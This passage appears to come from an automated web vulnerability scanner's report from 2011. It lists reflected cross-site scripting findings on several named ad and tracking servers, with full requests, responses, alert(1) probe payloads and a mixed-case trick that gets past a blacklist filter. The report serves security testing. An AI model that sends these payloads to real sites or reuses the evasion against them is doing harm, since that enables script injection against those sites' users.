Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:45 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2002
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
*/
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=&Section=Contactff6e0'-alert(1)-'995d46c06ef';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.252. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [_RM_HTML_referer_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1847468018@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8597'-alert(1)-'82371ff9afc was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1847468018@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=c8597'-alert(1)-'82371ff9afc&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2002
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=c8597'-alert(1)-'82371ff9afc&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection=
...[SNIP]...

1.253. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [_RM_HTML_title_ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1847468018@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f96e8'-alert(1)-'1b9d354877d was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1847468018@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxisf96e8'-alert(1)-'1b9d354877d&_RM_HTML_referer_=&Section=Contact HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:37 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2058
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
not contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxisf96e8'-alert(1)-'1b9d354877d&_RM_HTML_referer_=&Section=Contact';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='
...[SNIP]...

1.254. http://b3.mookie1.com/2/TRACK_Xaxis/1847468018@x54 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1847468018@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 19942'-alert(1)-'7ba8a232d35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1847468018@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=&Section=Contact&19942'-alert(1)-'7ba8a232d35=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/contact
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206407

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:49 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2005
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
/
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/contact&_RM_HTML_title_=Contact%20-%20Xaxis&_RM_HTML_referer_=&Section=Contact&19942'-alert(1)-'7ba8a232d35=1';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=
...[SNIP]...

1.255. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 6035d<script>alert(1)</script>1b3be9509f6 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_571986356046035d<script>alert(1)</script>1b3be9509f6&pid=b4abbe63-3e87-7d59-d16e-843d1259308e&s=300x250&f=0.25&cid=oxpv1%3A34-632-1929-1959-5517&hrid=f5d7e529747b83c9ba2cb7ea52d3db0f-1309224168 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5517&cb=INSERT_RANDOM_NUMBER_HERE
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; s=aced62d8-bd2a-42cb-a7f5-2fd8226bf56a; p=1309224167

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1309224180; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_571986356046035d<script>alert(1)</script>1b3be9509f6({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAI2QvU7DMBSFT9M0cexCF37EAhV0rKX8OK4tx
...[SNIP]...

1.256. http://btilelog.access.mapquest.com/tilelog/transaction [transaction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://btilelog.access.mapquest.com
Path:   /tilelog/transaction

Issue detail

The value of the transaction request parameter is copied into the HTML document as plain text between tags. The payload 3519b<script>alert(1)</script>e346ba9821f was submitted in the transaction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /tilelog/transaction?transaction=script3519b<script>alert(1)</script>e346ba9821f&key=Gmjtd%7Clu6t2l6tnh%2C7g%3Do5-larxd&v=5.2.0&itkcss=true HTTP/1.1
Host: btilelog.access.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.totalmerrill.com/TotalMerrill/system/FABranchLocator.aspx?ddwnSearchType=BRANCH&fatype=wm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: psession="htZQI27rp9upP5M1sdqhuRpH5n4="; s_pers=%20s_getnr%3D1308924976986-New%7C1371996976986%3B%20s_nrgvo%3DNew%7C1371996976987%3B

Response

HTTP/1.1 400 Bad Request
Date: Wed, 29 Jun 2011 11:56:24 GMT
Server: Apache
Content-Length: 79
Cache-Control: max-age=300
Expires: Wed, 29 Jun 2011 12:01:24 GMT
Connection: close
Content-Type: text/plain

Bad Request (unknown command) script3519b<script>alert(1)</script>e346ba9821f

1.257. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 7419a<script>alert(1)</script>2c6269b7484 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=starcom01&aid=allstate01&cid=dr300x250tl&c=allstate01cont17419a<script>alert(1)</script>2c6269b7484&w=300&h=250&cam=1&plc=tl HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=2507911?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308923150.2.2.utmcsr=tos.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/legalapp/WEBPRIVACY/US/en/PC/; __utma=165058976.1665025129.1308533372.1308533372.1308923150.2

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:05:48 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 6947

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.ca.intMap = {};
   truste.img = new Image(1,1);
   truste.ca.resetCount = 0;
   truste.ca.i
...[SNIP]...
e] = bindings;
   };
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   };

   var te_clr1_allstate01cont17419a<script>alert(1)</script>2c6269b7484_ib = '\n<div id="te-clr1-allstate01cont17419a<script>
...[SNIP]...

1.258. http://choices.truste.com/ca [cam parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cam request parameter is copied into the HTML document as plain text between tags. The payload 93fec<ScRiPt>alert(1)</ScRiPt>7a662e0923b was submitted in the cam parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=starcom01&aid=allstate01&cid=dr300x250tl&c=allstate01cont1&w=300&h=250&cam=193fec<ScRiPt>alert(1)</ScRiPt>7a662e0923b&plc=tl HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=2507911?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308923150.2.2.utmcsr=tos.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/legalapp/WEBPRIVACY/US/en/PC/; __utma=165058976.1665025129.1308533372.1308533372.1308923150.2

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:06:02 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 5083

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bin
...[SNIP]...
nt1_bi)",icon:"http://choices.truste.com/assets/forward_i.png",icon_cam:"http://choices.truste.com/assets/admarker.png",iconText:"&nbsp;AdChoices",aid:"allstate01",pid:"starcom01",zindex:"10002",cam:"193fec<ScRiPt>alert(1)</ScRiPt>7a662e0923b",cid:"dr300x250tl"};
var tecabaseurl="http://choices.truste.com/";truste.ca.bindingInitMap[te_clr1_allstate01cont1_bi.baseName]=0;
truste.ca.intInitMap[te_clr1_allstate01cont1_bi.baseName]=te_clr1_all
...[SNIP]...

1.259. http://choices.truste.com/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload f04e9<ScRiPt>alert(1)</ScRiPt>27634612685 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=starcom01&aid=allstate01&cid=dr300x250tlf04e9<ScRiPt>alert(1)</ScRiPt>27634612685&c=allstate01cont1&w=300&h=250&cam=1&plc=tl HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=2507911?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308923150.2.2.utmcsr=tos.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/legalapp/WEBPRIVACY/US/en/PC/; __utma=165058976.1665025129.1308533372.1308533372.1308923150.2

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:05:37 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 5083

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bin
...[SNIP]...
p://choices.truste.com/assets/forward_i.png",icon_cam:"http://choices.truste.com/assets/admarker.png",iconText:"&nbsp;AdChoices",aid:"allstate01",pid:"starcom01",zindex:"10002",cam:"1",cid:"dr300x250tlf04e9<ScRiPt>alert(1)</ScRiPt>27634612685"};
var tecabaseurl="http://choices.truste.com/";truste.ca.bindingInitMap[te_clr1_allstate01cont1_bi.baseName]=0;
truste.ca.intInitMap[te_clr1_allstate01cont1_bi.baseName]=te_clr1_allstate01cont1_ib;tr
...[SNIP]...

1.260. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 7f156<ScRiPt>alert(1)</ScRiPt>c315d80be1b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=starcom01&aid=allstate01&cid=dr300x250tl&c=allstate01cont1&w=300&h=250&cam=1&plc=tl&7f156<ScRiPt>alert(1)</ScRiPt>c315d80be1b=1 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=2507911?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308923150.2.2.utmcsr=tos.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/legalapp/WEBPRIVACY/US/en/PC/; __utma=165058976.1665025129.1308533372.1308533372.1308923150.2

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:06:49 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 5048

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bin
...[SNIP]...
ste.ca.bindingInitMap[c.baseName]=f+1}var d=document.createElement("script");d.src="http://choices.truste.com/ca?pid=starcom01&aid=allstate01&cid=dr300x250tl&c=allstate01cont1&w=300&h=250&cam=1&plc=tl&7f156<ScRiPt>alert(1)</ScRiPt>c315d80be1b=1&js=2";
document.body.appendChild(d);var a=document.createElement("div");a.innerHTML=te_clr1_allstate01cont1_ib;
var e=a.firstChild;while(e&&e.nodeType==3){e=e.nextSibling}truste.ca.intMap[c.baseName
...[SNIP]...

1.261. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 9f154<ScRiPt>alert(1)</ScRiPt>c8a4c86bdd2 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=starcom01&aid=allstate01&cid=dr300x250tl&c=allstate01cont1&w=300&h=250&cam=1&plc=tl9f154<ScRiPt>alert(1)</ScRiPt>c8a4c86bdd2 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/x1.rtb/allstate/poem1;sz=300x250;click=http://bn.xp1.ru4.com/bclick?_f=e3c21e8b-5821-4f72-aba5-f7c02835f77e&_o=15719&_eo=97956&_et=1309226708&_a=17087056&_s=11683&_d=17473217&_c=17080509&_pm=97956&_pn=17474528&redirect=;u=17474528;ord=2507911?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165058976.1308923150.2.2.utmcsr=tos.ea.com|utmccn=(referral)|utmcmd=referral|utmcct=/legalapp/WEBPRIVACY/US/en/PC/; __utma=165058976.1665025129.1308533372.1308533372.1308923150.2

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 02:06:20 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 5083

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.listeners={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bin
...[SNIP]...
</div>\n';
var te_clr1_allstate01cont1_bi={baseName:"te-clr1-allstate01cont1",anchName:"te-clr1-allstate01cont1-anch",width:300,height:250,ox:0,oy:0,plc:"tl9f154<ScRiPt>alert(1)</ScRiPt>c8a4c86bdd2",iplc:"rel",intDivName:"te-clr1-allstate01cont1-itl",iconSpanId:"te-clr1-allstate01cont1-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"allstate01cont1",noticeBaseUrl:"http://
...[SNIP]...

1.262. http://core.insightexpressai.com/adServer/GetInvite2.aspx [creativeID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

The value of the creativeID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71921'-alert(1)-'eb0142dd444 was submitted in the creativeID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adServer/GetInvite2.aspx?esi=true&bannerID=178310&referer=econintersect.com&siteID=N884.InvestingChannel&placementID=62633688&creativeID=4168403371921'-alert(1)-'eb0142dd444 HTTP/1.1
Host: core.insightexpressai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://econintersect.com/b2evolution/blog1.php/2011/01/23/secondmarket-and-sharespost-the-new-market
Cookie: DW=30a71fe21309244435; IXAI2685=FTF

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Content-Length: 20311
Date: Tue, 28 Jun 2011 07:00:51 GMT
Connection: close
Cache-Control: no-store

var InsightExpress={};InsightExpress.LogText='';InsightExpress.Log=function(s,s2){if(!InsightExpress.LogText)InsightExpress.LogText='';InsightExpress.LogText+=s+(s2?' = '+s2:'')+'\n'};InsightExpress.D
...[SNIP]...
nsightExpress.DomainName='core.insightexpressai.com';InsightExpress.QueryString='esi=true&bannerID=178310&referer=econintersect.com&siteID=N884.InvestingChannel&placementID=62633688&creativeID=4168403371921'-alert(1)-'eb0142dd444'; InsightExpress.onload=function(){InsightExpress.Loaded=true;if(!InsightExpress.Cookies.Enabled()) return;var invite=new InsightExpress.PopUpInvite({"Disallow":{"SafeGuard":false,"REMO":false},"Type"
...[SNIP]...

1.263. http://core.insightexpressai.com/adServer/GetInvite2.aspx [esi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://core.insightexpressai.com
Path:   /adServer/GetInvite2.aspx

Issue detail

